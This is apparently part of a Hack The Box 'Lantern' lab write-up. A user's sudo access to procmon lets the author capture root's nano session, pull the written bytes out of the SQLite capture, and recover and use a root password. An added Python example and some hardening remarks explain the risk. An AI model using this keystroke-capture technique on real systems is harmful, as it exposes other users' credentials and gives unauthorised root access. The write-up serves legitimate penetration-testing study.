automation.sh


Up until this point, the /root/automation.sh script has come up several times.

  • It was first noticed during basic system enumeration after the initial foothold
    • It was being edited with nano at the time
  • It was then picked up by pspy
    • removing its .swp file, which is created while the file is open in a text editor
  • An HR mail asked the tomas user to review the /root/automation.sh script

Based on these observations, it is reasonable to infer that the tomas user is currently editing /root/automation.sh with nano under the security context of the root account

tomas@lantern:~$ ll /root/automation.sh
ls: cannot access '/root/automation.sh': Permission denied

While I cannot read the script as the tomas user in the current session, I can leverage the sudo privilege of the tomas user to attempt to MitM the editing session

Process Capture with procmon


tomas@lantern:~$ ps -auxwww | grep -i nano
root        9637  0.0  0.1   7404  4216 pts/0    Ss+  22:30   0:00 nano /root/automation.sh

I first need the PID of the nano process; from the output above it is 9637

tomas@lantern:~$ sudo -u root /usr/bin/procmon -p 9637 -e write

Then I can run procmon against that PID to capture the process. The -e flag restricts the capture to write operations only

Initially, the capture is empty

A moment later, entries start pouring in: a total of 5000 write operations from nano

I can then export the entire capture

tomas@lantern:~$ ll procmon*
-rw-r--r-- 1 root root 1343488 Aug 20 22:47 procmon_2024-08-20_22:42:37.db

procmon writes the capture to a DB file

┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ scp -i ./id_rsa.tomas tomas@lantern.htb:~/procmon_2024-08-20_22:42:37.db .
procmon_2024-08-20_22:42:37.db                                                                        100% 1312KB   3.2MB/s   00:00        

I will then transfer the DB file back to Kali via scp for examination

Inspection


The DB file is in SQLite format and contains 3 tables: ebpf, metadata, and stats

  • ebpf: This table might contain the bytecode or information related to the specific eBPF programs that were running.
  • metadata: This table likely contains contextual information such as timestamps, process IDs, or descriptions of the monitored events.
  • stats: This table probably stores performance statistics or counters related to the events monitored by the eBPF programs.

eBPF (Extended Berkeley Packet Filter) is a technology used primarily in Linux to execute custom bytecode within the kernel, allowing for efficient monitoring, tracing, and handling of network packets, system calls, and other kernel events.

Pattern


sqlite> select * from ebpf;
606|139953235044487$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|laurel|laurel|787|47968709326242|write|13225|
9879|139737857394823$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|6|47969412042975|write|9978|
9879|139737857394823$/usr/lib/x86_64-linux-gnu/libc.so.6!__write|nano|nano|0|47969412042975|write|30146|
 
[...REDACTED...]

Inspecting the ebpf table, the arguments column appears to contain binary blob data, which, as the name suggests, may contain user input

Sorting the entries by duration from high to low reveals an interesting pattern: the data occupies bytes 9 through 35, and the rest are null bytes

sqlite> select hex(substring(arguments,9,resultcode)) from ebpf where resultcode > 0 order by timestamp;

I can then use the substring function to extract the arguments column from the 9th byte for as many bytes as the resultcode column indicates, and wrap it in hex() since the data itself is a binary blob

I will save the content into the hex_out.txt file

┌──(kali㉿kali)-[~/archive/htb/labs/lantern]
└─$ cat hex_out.txt | tr -d '\n' | xxd -r -p
e
e
e
echo Q 33EEddddttddww33ppMMBB | s uuddoo . //bbaacckkuupp..sshh

Converting the extracted hex back into ASCII shows the typed characters, each one duplicated

echo Q3Eddtdw3pMB | sudo ./backup.sh

The above is the same line after removing the duplicated characters. Q3Eddtdw3pMB is likely the password of the root account
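To make the inspection step reproducible offline, the following is an added example (not code from the writeup, and not part of procmon) that builds a small in-memory SQLite table shaped like the ebpf table described above, runs the same substr()-based query, and collapses the duplicated characters. The column names pid, comm, resultcode, timestamp, syscall, duration and arguments, the 8-byte prefix before the write buffer, and the captured line itself are all assumptions or constructed values, not data from the lab. The point it illustrates from a defender's side: a user who can run a kernel tracer such as procmon through sudo can read every byte root writes to a terminal, so that sudo rule is equivalent to handing out root.

```python
import sqlite3
import struct

# Constructed sample: the line root is assumed to have typed (placeholder, not the lab's value).
TYPED = b"echo N0tAPassw0rd-demo | sudo ./backup.sh"
# The capture shows each typed byte twice, so the echoed stream is every byte doubled.
ECHOED = bytes(b for ch in TYPED for b in (ch, ch))
# Split the echoed stream into three write() calls; the first boundary falls inside a
# doubled pair, which is why de-duplication must happen after the chunks are joined.
CHUNKS = [ECHOED[:9], ECHOED[9:29], ECHOED[29:]]


def write_args_blob(fd: int, payload: bytes, size: int = 128) -> bytes:
    """Assumed layout of the arguments blob: 8-byte fd, then the write buffer,
    zero-padded. This matches the page's observation that data starts at byte 9."""
    return struct.pack("<Q", fd) + payload.ljust(size - 8, b"\x00")


def build_capture() -> sqlite3.Connection:
    """Build an in-memory table with the assumed ebpf schema and constructed rows.
    Rows are inserted out of order so the ORDER BY timestamp in the query matters."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ebpf (pid INTEGER, comm TEXT, resultcode INTEGER, "
        "timestamp INTEGER, syscall TEXT, duration INTEGER, arguments BLOB)"
    )
    rows = [
        (9637, "nano", len(CHUNKS[1]), 200, "write", 12, write_args_blob(1, CHUNKS[1])),
        (787, "laurel", 11, 150, "write", 8, write_args_blob(3, b"audit entry")),
        (9637, "nano", len(CHUNKS[2]), 300, "write", 15, write_args_blob(1, CHUNKS[2])),
        (9637, "nano", 0, 250, "write", 1, write_args_blob(1, b"")),  # empty write, filtered out
        (9637, "nano", len(CHUNKS[0]), 100, "write", 9, write_args_blob(1, CHUNKS[0])),
    ]
    conn.executemany("INSERT INTO ebpf VALUES (?, ?, ?, ?, ?, ?, ?)", rows)
    return conn


def reconstruct_writes(conn: sqlite3.Connection, comm: str = "nano") -> bytes:
    """Same extraction as the page's query (substr from byte 9 for resultcode bytes,
    ordered by timestamp), with an added filter on comm so unrelated processes
    such as laurel do not pollute the stream."""
    cur = conn.execute(
        "SELECT substr(arguments, 9, resultcode) FROM ebpf "
        "WHERE resultcode > 0 AND comm = ? ORDER BY timestamp",
        (comm,),
    )
    return b"".join(row[0] for row in cur)


def collapse_pairs(data: bytes) -> bytes:
    """Collapse each pair of identical adjacent bytes into one byte.
    A character that was genuinely typed twice (the "ss" in the sample) shows up
    as four bytes and correctly survives as two."""
    out = bytearray()
    i = 0
    while i < len(data):
        out.append(data[i])
        if i + 1 < len(data) and data[i + 1] == data[i]:
            i += 2
        else:
            i += 1
    return bytes(out)


def recover_typed_line(conn: sqlite3.Connection) -> bytes:
    """Join all nano write buffers in time order, then remove the duplication."""
    return collapse_pairs(reconstruct_writes(conn))


if __name__ == "__main__":
    capture = build_capture()
    print("raw stream :", reconstruct_writes(capture))
    print("recovered  :", recover_typed_line(capture))
```

The ordering and joining before de-duplication is the part that is easy to get wrong: collapsing each write buffer on its own would split a doubled pair across two rows and leave stray characters behind. From a hardening perspective, the recoverable line is the reason tracing tools belong on the same trust level as a root shell; a sudo rule for procmon, bpftrace or similar should be treated as full root when reviewing sudoers.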

Validation


tomas@lantern:~$ su root
Password: Q3Eddtdw3pMB
root@lantern:/home/tomas# whoami
root
root@lantern:/home/tomas# hostname
lantern
root@lantern:/home/tomas# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:94:84:b0 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    altname ens160
    inet 10.129.229.250/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2689sec preferred_lft 2689sec
    inet6 dead:beef::250:56ff:fe94:84b0/64 scope global dynamic mngtmpaddr 
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:fe94:84b0/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise